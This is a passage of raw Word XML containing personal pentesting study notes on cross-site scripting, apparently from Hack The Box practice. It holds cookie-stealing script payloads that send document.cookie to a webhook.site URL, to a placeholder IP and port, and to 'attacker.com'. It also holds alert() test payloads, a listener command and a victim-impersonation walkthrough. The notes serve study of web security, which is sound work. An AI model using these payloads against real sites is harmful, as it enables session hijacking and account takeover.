      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To DoS the posts page, send a post with javascript that redirects the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> window.location </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attribute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.location attribute tells where to redirect to, so we can make it redirect to any malicious website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B96">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind XSS to steal Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="https://webhook.site/9d1d1d19-a1e8-43a5-ac45-fb632363f694/?cookie="+btoa(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for web hooks and it uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with your own web hook URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="http://[IP]:[Port]/?cookie="+btoa(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF YOU USE WEBHOOKS, MAKE SURE TO DO https, not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for sending the cookies to your local computer, probably catching via python server or something </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IP]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Port] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with where you are listening. Or if you are using webhook, then just paste in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then use Webhook or set up a python server to listen to request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag in Python stands for module. It tells Python to locate the specified module (in this case, http.server), and run it as a script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple way to steal cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; fetch('http://your-attack-server.com?cookie=' + document.cookie); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL Testing (Reflected XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add payloads in query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://example.com/?q=&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if your payload is executed in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM Testing (DOM-based XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use browser dev tools to inspect JavaScript code and find functions like innerHTML, document.write, or eval() that handle user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject payloads directly into these inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Plays Out in a Real Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. You insert the malicious script into a comment box:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  fetch('https://attacker.com?cookie=' + document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. A victim logs into the website and visits the page containing your comment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Their browser automatically executes the script because the website didn't sanitize or filter the input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The victim's cookies (which may include their session token) are sent to https://attacker.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. On the attacker's server, the cookies are logged, allowing the attacker to impersonate the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One strategy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is that if it detects XSS in the main user input, but then it display content of the request header (ex. URL, user-agent, Accept), then we can intercept the request via BurpSuite, and inject XSS into the any of the request headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was practiced in the Headless HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
